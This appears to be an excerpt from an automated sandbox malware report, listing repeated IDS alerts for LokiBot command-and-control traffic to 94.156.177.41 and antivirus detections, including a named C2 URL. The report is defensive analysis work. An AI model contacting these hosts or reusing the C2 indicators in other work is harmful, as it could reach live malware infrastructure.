Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:51:32.799150+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50032	94.156.177.41	80	TCP
2024-12-09T08:51:44.928264+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:46.616642+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:48.439293+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:50.109741+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:52.322198+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:53.986106+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:55.804149+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:52:00.480412+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:02.310802+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:07.215515+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:09.028698+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:10.848504+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:13.030024+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:15.247122+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:16.935958+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:21.764409+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:23.587495+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:25.264366+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:27.091553+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:28.905374+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:30.743567+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:32.430394+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:34.283694+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:36.102690+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:37.818426+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:39.497811+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:41.152631+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:42.964742+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:44.776414+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:46.592675+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:48.268574+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:50.978504+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:52.651034+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:54.731708+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:56.395944+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:58.223873+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:53:00.043307+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:01.856477+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:03.676877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:05.342475+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:07.013704+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:08.848305+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:10.512942+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:12.323602+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:14.137920+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:15.952241+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:17.623736+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:19.453534+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:21.134282+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:23.236388+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:25.096431+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:26.917838+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:31.731754+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:34.080464+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:38.905570+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.6	50020	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:51:32.799150+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	50032	94.156.177.41	80	TCP
2024-12-09T08:51:44.928264+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:46.616642+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:48.439293+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:50.109741+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:52.322198+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:53.986106+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:55.804149+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:52:00.480412+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:02.310802+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:07.215515+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:09.028698+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:10.848504+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:13.030024+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:15.247122+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:16.935958+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:21.764409+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:23.587495+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:25.264366+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:27.091553+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:28.905374+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:30.743567+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:32.430394+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:34.283694+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:36.102690+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:37.818426+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:39.497811+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:41.152631+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:42.964742+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:44.776414+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:46.592675+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:48.268574+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:50.978504+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:52.651034+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:54.731708+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:56.395944+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:58.223873+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:53:00.043307+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:01.856477+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:03.676877+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:05.342475+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:07.013704+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:08.848305+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:10.512942+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:12.323602+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:14.137920+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:15.952241+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:17.623736+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:19.453534+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:21.134282+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:23.236388+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:25.096431+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:26.917838+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:31.731754+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:34.080464+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:38.905570+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.6	50020	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:51:39.566096+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:41.388226+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49708	94.156.177.41	80	TCP
2024-12-09T08:51:43.494161+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:45.316994+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:46.997946+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:48.825174+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:50.500278+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:52.709648+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:54.371881+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:56.186859+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:00.874032+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:02.924152+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:07.593802+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:09.406949+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:11.232353+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:13.423061+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:15.682605+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:17.325150+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:22.154447+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:23.972500+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:25.653268+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:27.621178+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:29.310465+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:31.142639+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:32.844275+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:34.672995+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:36.479932+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:38.214537+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:39.872509+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:41.529353+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:43.346921+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:45.154565+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:46.983185+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:48.658727+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:51.358825+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:53.027579+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:55.108776+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:56.790419+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:52:58.611498+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:00.419701+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:02.244480+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:04.064839+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:05.731669+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:07.405384+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:09.232229+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:10.889178+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:12.702697+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:14.518189+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:16.345760+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:18.018612+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:19.857048+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:21.514620+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:23.627769+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:25.479289+0100	2021641	1	A Network Trojan was detected	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:27.294180+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:32.251367+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:34.465271+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:39.296364+0100	2021641	1	A Network Trojan was detected	192.168.2.6	50032	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-09T08:51:39.566096+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:41.388226+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49708	94.156.177.41	80	TCP
2024-12-09T08:51:43.494161+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:45.316994+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:46.997946+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49713	94.156.177.41	80	TCP
2024-12-09T08:51:48.825174+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49715	94.156.177.41	80	TCP
2024-12-09T08:51:50.500278+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49721	94.156.177.41	80	TCP
2024-12-09T08:51:52.709648+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49726	94.156.177.41	80	TCP
2024-12-09T08:51:54.371881+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49732	94.156.177.41	80	TCP
2024-12-09T08:51:56.186859+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49736	94.156.177.41	80	TCP
2024-12-09T08:52:00.874032+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49755	94.156.177.41	80	TCP
2024-12-09T08:52:02.924152+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49757	94.156.177.41	80	TCP
2024-12-09T08:52:07.593802+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49773	94.156.177.41	80	TCP
2024-12-09T08:52:09.406949+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49775	94.156.177.41	80	TCP
2024-12-09T08:52:11.232353+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49781	94.156.177.41	80	TCP
2024-12-09T08:52:13.423061+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49787	94.156.177.41	80	TCP
2024-12-09T08:52:15.682605+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49793	94.156.177.41	80	TCP
2024-12-09T08:52:17.325150+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49799	94.156.177.41	80	TCP
2024-12-09T08:52:22.154447+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49811	94.156.177.41	80	TCP
2024-12-09T08:52:23.972500+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49818	94.156.177.41	80	TCP
2024-12-09T08:52:25.653268+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49823	94.156.177.41	80	TCP
2024-12-09T08:52:27.621178+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49828	94.156.177.41	80	TCP
2024-12-09T08:52:29.310465+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49833	94.156.177.41	80	TCP
2024-12-09T08:52:31.142639+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49836	94.156.177.41	80	TCP
2024-12-09T08:52:32.844275+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49841	94.156.177.41	80	TCP
2024-12-09T08:52:34.672995+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49848	94.156.177.41	80	TCP
2024-12-09T08:52:36.479932+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49854	94.156.177.41	80	TCP
2024-12-09T08:52:38.214537+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49859	94.156.177.41	80	TCP
2024-12-09T08:52:39.872509+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49863	94.156.177.41	80	TCP
2024-12-09T08:52:41.529353+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49867	94.156.177.41	80	TCP
2024-12-09T08:52:43.346921+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49873	94.156.177.41	80	TCP
2024-12-09T08:52:45.154565+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49879	94.156.177.41	80	TCP
2024-12-09T08:52:46.983185+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49885	94.156.177.41	80	TCP
2024-12-09T08:52:48.658727+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49888	94.156.177.41	80	TCP
2024-12-09T08:52:51.358825+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49896	94.156.177.41	80	TCP
2024-12-09T08:52:53.027579+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49900	94.156.177.41	80	TCP
2024-12-09T08:52:55.108776+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49906	94.156.177.41	80	TCP
2024-12-09T08:52:56.790419+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49911	94.156.177.41	80	TCP
2024-12-09T08:52:58.611498+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49917	94.156.177.41	80	TCP
2024-12-09T08:53:00.419701+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49924	94.156.177.41	80	TCP
2024-12-09T08:53:02.244480+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49929	94.156.177.41	80	TCP
2024-12-09T08:53:04.064839+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49935	94.156.177.41	80	TCP
2024-12-09T08:53:05.731669+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49937	94.156.177.41	80	TCP
2024-12-09T08:53:07.405384+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49943	94.156.177.41	80	TCP
2024-12-09T08:53:09.232229+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49949	94.156.177.41	80	TCP
2024-12-09T08:53:10.889178+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49954	94.156.177.41	80	TCP
2024-12-09T08:53:12.702697+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49960	94.156.177.41	80	TCP
2024-12-09T08:53:14.518189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49962	94.156.177.41	80	TCP
2024-12-09T08:53:16.345760+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49968	94.156.177.41	80	TCP
2024-12-09T08:53:18.018612+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49973	94.156.177.41	80	TCP
2024-12-09T08:53:19.857048+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49978	94.156.177.41	80	TCP
2024-12-09T08:53:21.514620+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49984	94.156.177.41	80	TCP
2024-12-09T08:53:23.627769+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49990	94.156.177.41	80	TCP
2024-12-09T08:53:25.479289+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	49994	94.156.177.41	80	TCP
2024-12-09T08:53:27.294180+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50000	94.156.177.41	80	TCP
2024-12-09T08:53:32.251367+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50014	94.156.177.41	80	TCP
2024-12-09T08:53:34.465271+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50020	94.156.177.41	80	TCP
2024-12-09T08:53:39.296364+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50032	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0yWVteGq5T.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	Avira URL Cloud: Label: phishing
